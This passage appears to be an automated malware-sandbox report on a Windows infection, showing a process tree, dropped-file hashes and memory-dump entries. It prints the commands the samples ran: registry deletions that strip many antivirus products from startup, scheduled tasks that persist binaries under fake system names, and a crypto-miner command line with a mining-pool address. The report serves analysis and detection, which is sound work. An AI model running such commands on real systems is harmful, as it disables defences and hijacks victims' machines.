"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
PID:4748
C:\Users\Admin\AppData\Local\Temp\C9C0.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\C9C0.exe
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3904
  C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\reviewbrokercrtCommon\kB5VrhbV.vbe"
    - Suspicious use of WriteProcessMemory
    PID:3180
    C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\reviewbrokercrtCommon\94dfcaErtMmvX.bat" "
      - Suspicious use of WriteProcessMemory
      PID:204
      C:\reviewbrokercrtCommon\reviewbrokercrtCommonsessionperfDll.exe
        Command line: "C:\reviewbrokercrtCommon\reviewbrokercrtCommonsessionperfDll.exe"
        - Executes dropped EXE
        - Adds Run key to start application
        - Drops file in System32 directory
        - Drops file in Program Files directory
        - Drops file in Windows directory
        - Suspicious use of AdjustPrivilegeToken
        PID:512
        C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe
          Command line: "C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe"
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
          PID:4472

C:\Users\Admin\AppData\Local\Temp\CCDE.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\CCDE.exe
  - Executes dropped EXE
  PID:3148
  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
    - Drops startup file
    PID:2300

C:\Users\Admin\AppData\Local\Temp\D1F0.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\D1F0.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:812
  C:\Users\Admin\AppData\Local\Temp\D1F0.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\D1F0.exe
    PID:1280
  C:\Users\Admin\AppData\Local\Temp\D1F0.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\D1F0.exe
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4204
    C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 1472
      - Program crash
      PID:4792

C:\Users\Admin\AppData\Local\Temp\DD5B.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\DD5B.exe
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1912

C:\Users\Admin\AppData\Local\Temp\E4CE.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\E4CE.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3948
  C:\Users\Admin\AppData\Local\Temp\proliv.sfx.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\proliv.sfx.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2904
    C:\Users\Admin\AppData\Local\Temp\proliv.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\proliv.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      PID:1768
      C:\Users\Admin\AppData\Local\Temp\26.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\26.exe"
        - Executes dropped EXE
        PID:3528
        C:\Windows\System32\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
          PID:4888
          C:\Windows\system32\schtasks.exe
            Command line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
            - Creates scheduled task(s)
            PID:4376
        C:\Users\Admin\AppData\Local\Temp\services64.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\services64.exe"
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          PID:1612
          C:\Windows\System32\cmd.exe
            Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
            PID:3272
            C:\Windows\system32\schtasks.exe
              Command line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
              - Creates scheduled task(s)
              PID:5096
          C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
            Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
            - Executes dropped EXE
            PID:4008
          C:\Windows\explorer.exe
            Command line: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6112066 --pass=myminer --cpu-max-threads-hint=50 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --nicehash --tls --cinit-stealth
            PID:4628
      C:\Users\Admin\AppData\Local\Temp\234.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\234.exe"
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken
        PID:3456

C:\Windows\SysWOW64\explorer.exe
  Command line: C:\Windows\SysWOW64\explorer.exe
  PID:3640

C:\Windows\explorer.exe
  Command line: C:\Windows\explorer.exe
  PID:2296

C:\Windows\SysWOW64\explorer.exe
  Command line: C:\Windows\SysWOW64\explorer.exe
  PID:2272

C:\Windows\explorer.exe
  Command line: C:\Windows\explorer.exe
  PID:3640

C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\schemas\AvailableNetwork\explorer.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Creates scheduled task(s)
  PID:3608

C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\NetTCPIP_Uninstall\WmiPrvSE.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Creates scheduled task(s)
  PID:4176

C:\Windows\SysWOW64\explorer.exe
  Command line: C:\Windows\SysWOW64\explorer.exe
  PID:4208

C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\WmiPrvSE.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Creates scheduled task(s)
  PID:4224

C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\System32\KBDTH3\spoolsv.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Creates scheduled task(s)
  PID:4252

C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Windows\System32\C_1142\SppExtComObj.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Creates scheduled task(s)
  PID:4284

C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\odt\dllhost.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Creates scheduled task(s)
  PID:4312

C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Creates scheduled task(s)
  PID:4364

C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Windows\System32\ddptrace\taskhostw.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Creates scheduled task(s)
  PID:4400

C:\Windows\explorer.exe
  Command line: C:\Windows\explorer.exe
  PID:4408

C:\Windows\SysWOW64\explorer.exe
  Command line: C:\Windows\SysWOW64\explorer.exe
  PID:4548

C:\Windows\explorer.exe
  Command line: C:\Windows\explorer.exe
  PID:4600

C:\Windows\SysWOW64\explorer.exe
  Command line: C:\Windows\SysWOW64\explorer.exe
  PID:4672

C:\Users\Admin\AppData\Roaming\hcvjrdv
  Command line: C:\Users\Admin\AppData\Roaming\hcvjrdv
  PID:2080
  C:\Users\Admin\AppData\Roaming\hcvjrdv
    Command line: C:\Users\Admin\AppData\Roaming\hcvjrdv
    PID:4024
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe
  MD5 f3eb1441de3cebd14b359c65b5b653f5
  SHA1 77be83e6961da1a8df572568bdb5441232d01f76
  SHA256 1176a29ec090a8f652a04e4ef39c2a64a04620bad9e2cf408f8dc5e668fee5ff
  SHA512 e5d5cd8e39fabe38a63d1bb62469413a5bd8f7fc00b933306cde702500df80a616b16980e5262e232ff85c78f8123e2fbe549b4e26070f9f3fd14eb35e6c569c
- C:\ProgramData\Runtimebroker.exe
  MD5 fc6b4fc6ddb243b30b3c588ead175228
  SHA1 cf3bd42cc74d6640483413903adef546f2ad364b
  SHA256 1de188e35ae4f941e35d12a2a38219a0300465b6a28aea39e6f40167578829d2
  SHA512 2e6bd36dd7a9de843f8954968b9b96ec26c96ff0d59a6f1809a4e2431ba2b14a4740c4b33d68ccabe9de15af2c2bd5443c8d7e5be1ee7bea20814134b673db55
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  MD5 6bf0e5945fb9da68e1b03bdaed5f6f8d
  SHA1 eed3802c8e4abe3b327c100c99c53d3bbcf8a33d
  SHA256 dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1
  SHA512 977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5 03114921d9d895a7dac357cbd31adc92
  SHA1 828872a8680e2d925c84e927ea8c97d3f3ecce8c
  SHA256 53c55924a28e99c698c739077f8b765b99cd53c738751170a1bed364c5da8c50
  SHA512 3af636dfd3a65dee356c6084fe3da899e82e1a9041bc6cf6def4c64339e064234acbbefaaa002a2ef0e6307aaab1799dccac5bc667d5ce333d9fafd8ab8f6580
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5 20037cb8f18a88d5bd93b56e52766867
  SHA1 b367ce8e287b5336d0e427bf0a6e64b533d85c66
  SHA256 002d3d9c95b58095718a7fb70aa08520c892c787b3cd654d213620f7fb7444fc
  SHA512 bfe33e3a64332d491e81b3c3b8f47bfef438dffe3c93ffb8f8a03e6c4f970449f7968991d88a64aae9801de29a8d325d34e44fabc167c91e5b19892fe4eb55ea
- C:\Users\Admin\AppData\Local\Temp\234.exe
  MD5 5ea6724594ae7388707940207c697f26
  SHA1 057f889f0ddfa45c1eaed757b0e6c0a60231323f
  SHA256 eec3ec5cb7152e80965c6c0bbccc9e2edfa4235cdc57e962cbdb6707ac457841
  SHA512 5bbaa94d0c8077cf3340a8042709af4709e60421123d7884d6e9a0095612edb30798c0c568313d0436f40ec079632182b9df9057b4a95a1853d6125db981d7fb
- C:\Users\Admin\AppData\Local\Temp\26.exe
  MD5 18a3374de4af9c1e15d04da1b73bddee
  SHA1 924fd3d4f448d74cb79c530a366c2c13fb376d95
  SHA256 3d3042a438cbe92a3a99ed1f506d18942621d718f6fb3690662acd47d8dfa706
  SHA512 6e1287d4b5808d6ec414c45abf61c1d0a0dd0d9f0e113a041dceecea035182a590efb339cfa3fe91ca06e309d3770de6e984699b17108e047f4fc566dd0612d1
- C:\Users\Admin\AppData\Local\Temp\C401.exe
  MD5 a69e12607d01237460808fa1709e5e86
  SHA1 4a12f82aee1c90e70cdf6be863ce1a749c8ae411
  SHA256 188e05efb42c1f7fdb5c910a6614f710a87ae642b23ac9ffe3f75246744865bc
  SHA512 7533e6da6bac0405fc8b608da8020b54b6ee02592e6fd40ea342e130a8a876ae5ef4a1fd636d95e76339dbf8be45cecbd22ca2d0a4635b055ffafec3d7e15284
- C:\Users\Admin\AppData\Local\Temp\C838.exe
  MD5 fc6b4fc6ddb243b30b3c588ead175228
  SHA1 cf3bd42cc74d6640483413903adef546f2ad364b
  SHA256 1de188e35ae4f941e35d12a2a38219a0300465b6a28aea39e6f40167578829d2
  SHA512 2e6bd36dd7a9de843f8954968b9b96ec26c96ff0d59a6f1809a4e2431ba2b14a4740c4b33d68ccabe9de15af2c2bd5443c8d7e5be1ee7bea20814134b673db55
- C:\Users\Admin\AppData\Local\Temp\C9C0.exe
  MD5 6c5495906ddb50bedc2e331c424f8656
  SHA1 ffea086f81d853fb73796af1f91c6af0c5ce5011
  SHA256 9da59ca44258f50a20fc82517c9c8819af388dc7bb0932d58f275918121150ed
  SHA512 ef8358d3d369c390d1bf80e06a229b35f7c7dc8f70c776ea87273ab4f7d81e724f61ec02c63b0312d4b5f6089e6f0ff3ba32307d8f2290fe88a853de0bce261d
- C:\Users\Admin\AppData\Local\Temp\CCDE.exe
  MD5 b19ac380411ed5d8b5a7e7e0c1da61a6
  SHA1 9665c20336a5ce437bbf7b564370bfa43e99954c
  SHA256 aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619
  SHA512 73b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208
- C:\Users\Admin\AppData\Local\Temp\D1F0.exe
  MD5 5707ddada5b7ea6bef434cd294fa12e1
  SHA1 45bb285a597b30e100ed4b15d96a29d718697e5e
  SHA256 85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
  SHA512 91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
- C:\Users\Admin\AppData\Local\Temp\DD5B.exe
  MD5 36be70d548f9f23f0afc0ef6b3c5155e
  SHA1 22f98051863bbaa13ac1ca349470d9463ac63a55
  SHA256 48ba5b838792bed9d4194a750ffe6ec30df56b27973d3572fa0f7bd1c6cfa470
  SHA512 09e88821ca6fc3ea39fe32adbbaeb3f5f7265002e3d9b6c47454d4da2c9cc037e722adf73ec0d8b36763d67101fed7893fa8048d1bc0c4a904f502831240012d
- C:\Users\Admin\AppData\Local\Temp\E4CE.exe
  MD5 144c6267d61e15dc7a6d6c0319bcc0d1
  SHA1 aba2ea88a1a69c6373e545f86043ed0d112339f2
  SHA256 b1a95809dae77f792c865544b3161104a8642456045b0ba6f5626cbb919f6619
  SHA512 7670f7bd5974145ee619caf4a59f05fcfd34d63d7d9f5148daf78f89ebd0860c1df7c12d1040ec96057f0eb4a06d2f2dd0c755053997aed0fc25d8569ad69bd9
- C:\Users\Admin\AppData\Local\Temp\proliv.exe
  MD5 001fda9f211b64e49aca869014a13eb6
  SHA1 291e30076d8f27695aab309c211544002fbf895d
  SHA256 35806c2f644a72dec6e41725e5cdc83350ad806b9c94abbd0ef79df122d0cc81
  SHA512 43f71306dcdddcfeabf1ff46de88630db009e805aa970e80ebdbe0a65165fe96ffd6693d9fa3842fa7ac9357207961d05353dce5878e9153f837855b82827ed5
- C:\Users\Admin\AppData\Local\Temp\proliv.sfx.exe
  MD5 a122885469f2988860fda435e98ebcaa
  SHA1 513ed2bd95c23df4df782780c23c6711094c2e0f
  SHA256 9a84d0e5824ac5564fe5f4d594e859ff649e30ad93c2c761e60088791fa17ed9
  SHA512 46bc447095971945113454b4030309e7331710de04714eb22af4af20f1f7a7bfc0540428be1060ac988ceefe9c9692a74ce06de90e953269e664af3ed81d92d2
- C:\Users\Admin\AppData\Local\Temp\s.bat
  MD5 7ee914fac949413f79d8f021d5c84e3e
  SHA1 482008e5146719dc281659d9f670824b2a1037b9
  SHA256 59b09569ac69ac1239df3aa260ba4fc70cf63fdf980275aa39cea7a1b068f94a
  SHA512 e7657f7e3ec040ef166206b4044ea3e746afed6c5ce6958bcf8e9bac0b7bf814dd339aaef9f59d86ad737cdac24131c6cbaa7bf106f3f8f591115cec9e668f32
- C:\Users\Admin\AppData\Local\Temp\services64.exe
  MD5 18a3374de4af9c1e15d04da1b73bddee
  SHA1 924fd3d4f448d74cb79c530a366c2c13fb376d95
  SHA256 3d3042a438cbe92a3a99ed1f506d18942621d718f6fb3690662acd47d8dfa706
  SHA512 6e1287d4b5808d6ec414c45abf61c1d0a0dd0d9f0e113a041dceecea035182a590efb339cfa3fe91ca06e309d3770de6e984699b17108e047f4fc566dd0612d1
- C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
  MD5 6e38fa5be0c74c8dfdc11d01c35f3dce
  SHA1 38bd9c169e804833d10765cbf94bf179f7d97f5f
  SHA256 6e102a1c5922e9739e095ed05dbbc8c95813151657cf5c431a5d112d704d6c15
  SHA512 79815aa09953e7e0938f64c5184a51c29650d53dbafb4f8f5decb79debd25e43121de1b6201753aa245b09cfdc3e30df0099c6f2f27a9d0b05ae65bd787ed55e
- C:\Users\Admin\AppData\Roaming\hcvjrdv
  MD5 bfa1eae4dbb897d44aed1a349d7b66eb
  SHA1 af2895ea60efb8f7ab997b1dd9f958a0d881fc9a
  SHA256 1202993e02cafc378caaea494d97555457f72369b6b94fcfd0202a4cbdf8a9c8
  SHA512 545544ab90c14adbd090dd1acfe157cf570f695631ecef18cd011a56286da264b0f000cee485199c1185258ac7aed2386a63fd0b3d89250d402e522202603c46
- C:\reviewbrokercrtCommon\94dfcaErtMmvX.bat
  MD5 ff43e4c7b1188d346031035c55623641
  SHA1 5268e47d207e3d8a5ec6ed423116bde9a073a28e
  SHA256 e4897ed926dc76d2c62caab76b84201fac67cb53d2c4efad75aeb4551ade19e9
  SHA512 3295c4418bb9671e9b93b0ddc67c1650e12d3b905e021b355e2820a73502606278afb003673905f8eabbce96cd9afdd420239514ef8175b63e08f84a449b693a
- C:\reviewbrokercrtCommon\kB5VrhbV.vbe
  MD5 8983bf9670fc6d1327d916b0443c25c6
  SHA1 562b4d499b0a542ae12d337042fe487bc21ce8d6
  SHA256 1cc898da3a1510b63ca6499ef0119513196a974b58b68443bb47fd575743b7c7
  SHA512 4b586e0596d90844a688e18cc9645dcaa04efa5c65cf936b239c5e2ffcb9befe44d79bfa5c3804e7930d1dce2dc7190872e81aea49b8cdfadb63865465d2a4e6
- C:\reviewbrokercrtCommon\reviewbrokercrtCommonsessionperfDll.exe
  MD5 f3eb1441de3cebd14b359c65b5b653f5
  SHA1 77be83e6961da1a8df572568bdb5441232d01f76
  SHA256 1176a29ec090a8f652a04e4ef39c2a64a04620bad9e2cf408f8dc5e668fee5ff
  SHA512 e5d5cd8e39fabe38a63d1bb62469413a5bd8f7fc00b933306cde702500df80a616b16980e5262e232ff85c78f8123e2fbe549b4e26070f9f3fd14eb35e6c569c
- \Users\Admin\AppData\LocalLow\nW6mI-7yS1k\freebl3.dll
  MD5 60acd24430204ad2dc7f148b8cfe9bdc
  SHA1 989f377b9117d7cb21cbe92a4117f88f9c7693d9
  SHA256 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
  SHA512 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01
- \Users\Admin\AppData\LocalLow\nW6mI-7yS1k\mozglue.dll
  MD5 eae9273f8cdcf9321c6c37c244773139
  SHA1 8378e2a2f3635574c106eea8419b5eb00b8489b0
  SHA256 a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
  SHA512 06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097
- \Users\Admin\AppData\LocalLow\nW6mI-7yS1k\nss3.dll
  MD5 02cc7b8ee30056d5912de54f1bdfc219
  SHA1 a6923da95705fb81e368ae48f93d28522ef552fb
  SHA256 1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
  SHA512 0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5
- \Users\Admin\AppData\LocalLow\nW6mI-7yS1k\softokn3.dll
  MD5 4e8df049f3459fa94ab6ad387f3561ac
  SHA1 06ed392bc29ad9d5fc05ee254c2625fd65925114
  SHA256 25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871
  SHA512 3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6
- \Users\Admin\AppData\LocalLow\sqlite3.dll
  MD5 f964811b68f9f1487c2b41e1aef576ce
  SHA1 b423959793f14b1416bc3b7051bed58a1034025f
  SHA256 83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
  SHA512 565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4
- memory/204-157-0x0000000000000000-mapping.dmp
- memory/512-163-0x0000000000000000-mapping.dmp
- memory/512-171-0x0000000000080000-0x0000000000081000-memory.dmp (Filesize 4KB)
- memory/512-184-0x00000000008B0000-0x00000000008B2000-memory.dmp (Filesize 8KB)
- memory/812-265-0x0000000005740000-0x0000000005761000-memory.dmp (Filesize 132KB)
- memory/812-136-0x0000000000000000-mapping.dmp
- memory/812-143-0x0000000000B40000-0x0000000000B41000-memory.dmp (Filesize 4KB)
- memory/812-149-0x0000000005540000-0x0000000005A3E000-memory.dmp (Filesize 5.0MB)
- memory/812-146-0x0000000005A40000-0x0000000005A41000-memory.dmp (Filesize 4KB)
- memory/812-155-0x00000000054D0000-0x00000000054D1000-memory.dmp (Filesize 4KB)
- memory/812-147-0x00000000055E0000-0x00000000055E1000-memory.dmp (Filesize 4KB)
- memory/1392-123-0x0000000000000000-mapping.dmp
- memory/1392-142-0x0000000000400000-0x0000000000916000-memory.dmp (Filesize 5.1MB)
- memory/1392-140-0x00000000001C0000-0x00000000001FB000-memory.dmp (Filesize 236KB)
- memory/1612-424-0x00000000037D0000-0x00000000037D2000-memory.dmp (Filesize 8KB)
- memory/1612-297-0x0000000000000000-mapping.dmp
- memory/1768-176-0x0000000000000000-mapping.dmp
- memory/1912-165-0x0000000000B00000-0x0000000000B91000-memory.dmp (Filesize 580KB)
- memory/1912-166-0x0000000000400000-0x0000000000943000-memory.dmp (Filesize 5.3MB)
- memory/1912-152-0x0000000000000000-mapping.dmp
- memory/2112-279-0x0000000008470000-0x0000000008471000-memory.dmp (Filesize 4KB)
- memory/2112-271-0x0000000004F60000-0x0000000004F61000-memory.dmp (Filesize 4KB)
- memory/2112-272-0x0000000004F62000-0x0000000004F63000-memory.dmp (Filesize 4KB)
- memory/2112-303-0x0000000009CF0000-0x0000000009E4B000-memory.dmp (Filesize 1.4MB)
- memory/2112-302-0x0000000004F63000-0x0000000004F64000-memory.dmp (Filesize 4KB)
- memory/2112-282-0x00000000088A0000-0x00000000088A1000-memory.dmp (Filesize 4KB)
- memory/2112-295-0x000000000A240000-0x000000000A241000-memory.dmp (Filesize 4KB)
- memory/2112-264-0x0000000000000000-mapping.dmp
- memory/2116-118-0x0000000000000000-mapping.dmp
- memory/2272-198-0x0000000000370000-0x0000000000377000-memory.dmp (Filesize 28KB)
- memory/2272-200-0x0000000000360000-0x000000000036B000-memory.dmp (Filesize 44KB)
- memory/2272-189-0x0000000000000000-mapping.dmp
- memory/2296-181-0x0000000000F20000-0x0000000000F27000-memory.dmp (Filesize 28KB)
- memory/2296-185-0x0000000000F10000-0x0000000000F1C000-memory.dmp (Filesize 48KB)
- memory/2296-177-0x0000000000000000-mapping.dmp
- memory/2300-207-0x0000000000000000-mapping.dmp
- memory/2524-114-0x0000000000400000-0x0000000000409000-memory.dmp (Filesize 36KB)
- memory/2524-115-0x0000000000402E1A-mapping.dmp
- memory/2904-169-0x0000000000000000-mapping.dmp
- memory/3028-117-0x0000000000F80000-0x0000000000F96000-memory.dmp (Filesize 88KB)
- memory/3028-583-0x0000000000FE0000-0x0000000000FF6000-memory.dmp (Filesize 88KB)
- memory/3148-148-0x00000000035B0000-0x00000000037F3000-memory.dmp (Filesize 2.3MB)
- memory/3148-131-0x0000000000000000-mapping.dmp
- memory/3148-210-0x0000000000400000-0x0000000002D86000-memory.dmp (Filesize 41.5MB)
- memory/3148-201-0x0000000005370000-0x0000000005581000-memory.dmp (Filesize 2.1MB)
- memory/3148-151-0x0000000000400000-0x0000000002D86000-memory.dmp (Filesize 41.5MB)
- memory/3180-135-0x0000000000000000-mapping.dmp
- memory/3200-205-0x0000000007670000-0x0000000007671000-memory.dmp (Filesize 4KB)
- memory/3200-256-0x0000000009520000-0x0000000009521000-memory.dmp (Filesize 4KB)
- memory/3200-187-0x0000000000000000-mapping.dmp
- memory/3200-204-0x0000000004C00000-0x0000000004C01000-memory.dmp (Filesize 4KB)
- memory/3200-262-0x0000000004B63000-0x0000000004B64000-memory.dmp (Filesize 4KB)
- memory/3200-258-0x0000000009480000-0x0000000009481000-memory.dmp (Filesize 4KB)
- memory/3200-221-0x0000000007F20000-0x0000000007F21000-memory.dmp (Filesize 4KB)
- memory/3200-257-0x0000000008850000-0x0000000008851000-memory.dmp (Filesize 4KB)
- memory/3200-211-0x0000000004B60000-0x0000000004B61000-memory.dmp (Filesize 4KB)
- memory/3200-212-0x0000000004B62000-0x0000000004B63000-memory.dmp (Filesize 4KB)
- memory/3200-237-0x0000000008270000-0x0000000008271000-memory.dmp (Filesize 4KB)
- memory/3200-238-0x00000000084B0000-0x00000000084B1000-memory.dmp (Filesize 4KB)
- memory/3200-216-0x0000000007E80000-0x0000000007E81000-memory.dmp (Filesize 4KB)
- memory/3200-218-0x0000000007EB0000-0x0000000007EB1000-memory.dmp (Filesize 4KB)
- memory/3200-217-0x0000000007D10000-0x0000000007D11000-memory.dmp (Filesize 4KB)
- memory/3200-242-0x0000000008790000-0x0000000008791000-memory.dmp (Filesize 4KB)
- memory/3272-423-0x0000000000000000-mapping.dmp
- memory/3456-197-0x0000000000260000-0x0000000000261000-memory.dmp (Filesize 4KB)
- memory/3456-214-0x00000000021F0000-0x00000000021F2000-memory.dmp (Filesize 8KB)
- memory/3456-209-0x000000001AEE0000-0x000000001AEE2000-memory.dmp (Filesize 8KB)
- memory/3456-192-0x0000000000000000-mapping.dmp
- memory/3528-288-0x0000000001180000-0x0000000001182000-memory.dmp (Filesize 8KB)
- memory/3528-287-0x0000000001190000-0x0000000001191000-memory.dmp (Filesize 4KB)
- memory/3528-193-0x00000000003B0000-0x00000000003B1000-memory.dmp (Filesize 4KB)
- memory/3528-284-0x0000000000BC0000-0x0000000000BCA000-memory.dmp (Filesize 40KB)
- memory/3528-285-0x0000000002A60000-0x0000000002A61000-memory.dmp (Filesize 4KB)
- memory/3528-188-0x0000000000000000-mapping.dmp
- memory/3640-178-0x0000000000800000-0x0000000000874000-memory.dmp (Filesize 464KB)
- memory/3640-206-0x0000000000000000-mapping.dmp
- memory/3640-213-0x0000000000510000-0x0000000000519000-memory.dmp (Filesize 36KB)
- memory/3640-183-0x0000000000530000-0x000000000059B000-memory.dmp (Filesize 428KB)
- memory/3640-215-0x0000000000500000-0x000000000050F000-memory.dmp (Filesize 60KB)
- memory/3640-164-0x0000000000000000-mapping.dmp
